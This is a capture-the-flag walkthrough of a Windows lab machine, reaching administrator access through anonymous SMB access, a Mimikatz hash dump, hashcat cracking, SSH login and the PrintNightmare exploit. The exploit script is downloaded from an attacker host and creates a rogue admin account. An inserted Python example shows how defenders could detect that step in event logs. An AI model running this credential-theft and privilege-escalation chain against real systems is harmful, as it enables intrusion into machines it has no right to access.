Walkthrough

Recon

nmap

PORT    STATE SERVICE      REASON  VERSION
22/tcp  open  ssh          syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
|   256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Enumerating SMB Shares

OldBoxes/bastian  smbclient -L \\\\10.10.10.134 -U 'anonymouse' -N 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
bastian/dump  smbclient \\\\10.10.10.134\\backups -U 'anonymouse' -N 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> timeout 1000000
io_timeout per operation is now 1000000
smb: \> mget * 

Enumerating the Windows disk image (VHD)

The Backups share contains a Windows disk backup (a VHD). Run Mimikatz against the SAM and SYSTEM hives inside that VHD to recover the NTLM hash of the user L4mpje: 26112010952d963c8dc4217daec986d9

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID  : 000001f5 (501)
User : Guest
RID  : 000003e8 (1000)
User : L4mpje
  Hash NTLM: 26112010952d963c8dc4217daec986d9

The Administrator entry's hash, 31d6cfe0d16ae931b73c59d7e0c089c0, is the NTLM hash of an empty password, so the L4mpje hash is the one worth cracking. Crack it with hashcat (-m 1000 selects NTLM):

bastian/dump  hashcat -a 0 -m 1000 l4mpje-ntlm /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

....

26112010952d963c8dc4217daec986d9:bureaulampje    

Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 26112010952d963c8dc4217daec986d9

Then log in over SSH as L4mpje with the cracked password:

bastian/dump  ssh L4mpje@10.10.10.134 
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt                                                                            
9bfe57d5c3309db3a151772f9d86c6cd      

Privilege Escalation

PrintNightmare (CVE-2021-1675)

PS C:\Users\L4mpje\Videos> Invoke-WebRequest "http://10.10.14.27:9001/CVE-2021-1675.ps1"

PS C:\Users\L4mpje\Videos> . .\CVE-2021-1675.ps1  
PS C:\Users\L4mpje\Videos> Invoke-Nightmare                                                                                     
[+] using default new user: adm1n                                                                                               
[+] using default new password: P@ssw0rd                                                                                        
[+] created payload at C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll                                                         
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_1734185bdb8f8610\Amd64\mxdwdrv.dll"   
[+] added user  as local administrator                                                                                          
[+] deleting payload from C:\Users\L4mpje\AppData\Local\Temp\nightmare.dll                                                      
PS C:\Users\L4mpje\Videos> net users                                                                                            

User accounts for \\BASTION                                                                                                     

-------------------------------------------------------------------------------                                                 
adm1n                    Administrator            DefaultAccount                                                                
Guest                    L4mpje                                                                                                 
The command completed successfully. 
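From the defender's side, the footprint of this step is a printer driver install followed seconds later by a new local account that is then added to Administrators (the adm1n user in the listing above). The correlation below is an added example, not part of the walkthrough: it runs over constructed event records in a simplified dict form, the event IDs are Microsoft's (PrintService 316, Security 4720 and 4732), the machine SID prefix is the Local SID from the lsadump output, and RID 1001 and the driver name are placeholders.

```python
from datetime import datetime, timedelta

# Event IDs used (all documented by Microsoft):
#   Microsoft-Windows-PrintService/Operational 316: printer driver added or updated
#   Security 4720: a user account was created
#   Security 4732: a member was added to a security-enabled local group
ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known BUILTIN\Administrators group SID

def find_admin_creation_chains(events, window=timedelta(minutes=10)):
    """Flag each 4732 into Administrators whose member SID appears in a 4720
    no more than `window` earlier, and attach any 316 driver installs seen in
    that window as supporting evidence. Correlating on SID rather than name
    matters because 4732 can report the member's account name as '-'."""
    evs = sorted(events, key=lambda e: e["time"])
    created = {}          # SID -> (time, account name) from 4720
    findings = []
    for e in evs:
        if e["id"] == 4720:
            created[e["sid"]] = (e["time"], e["account"])
        elif e["id"] == 4732 and e["group_sid"] == ADMINISTRATORS_SID:
            hit = created.get(e["member_sid"])
            if hit and timedelta(0) <= e["time"] - hit[0] <= window:
                drivers = [d["driver"] for d in evs
                           if d["id"] == 316 and hit[0] - window <= d["time"] <= e["time"]]
                findings.append({"account": hit[1], "created": hit[0],
                                 "admin_at": e["time"], "drivers": drivers})
    return findings

# Constructed sample. The machine SID prefix is the Local SID from lsadump
# above; RID 1001 and the driver name are placeholders.
MACHINE_SID = "S-1-5-21-18827714-3633218324-154007371"
T0 = datetime(2021, 7, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    {"time": T0, "id": 316, "driver": "PLACEHOLDER DRIVER NAME"},
    {"time": T0 + timedelta(seconds=2), "id": 4720,
     "sid": MACHINE_SID + "-1001", "account": "adm1n"},
    {"time": T0 + timedelta(seconds=3), "id": 4732,
     "member_sid": MACHINE_SID + "-1001", "group_sid": ADMINISTRATORS_SID},
    # Benign: the existing L4mpje account (RID 1000) added hours later, no 4720 nearby
    {"time": T0 + timedelta(hours=3), "id": 4732,
     "member_sid": MACHINE_SID + "-1000", "group_sid": ADMINISTRATORS_SID},
]

if __name__ == "__main__":
    for f in find_admin_creation_chains(SAMPLE_EVENTS):
        print(f"{f['account']} created at {f['created']}, admin at {f['admin_at']}, "
              f"drivers installed nearby: {f['drivers']}")
```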
bastian/dump  ssh adm1n@10.10.10.134 
adm1n@10.10.10.134's password: 
Permission denied, please try again.
adm1n@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                 
(c) 2016 Microsoft Corporation. All rights reserved.                                                   

adm1n@BASTION C:\Users\Administrator\Desktop>more root.txt                                             
958850b91811676ed6620a9c430e65c8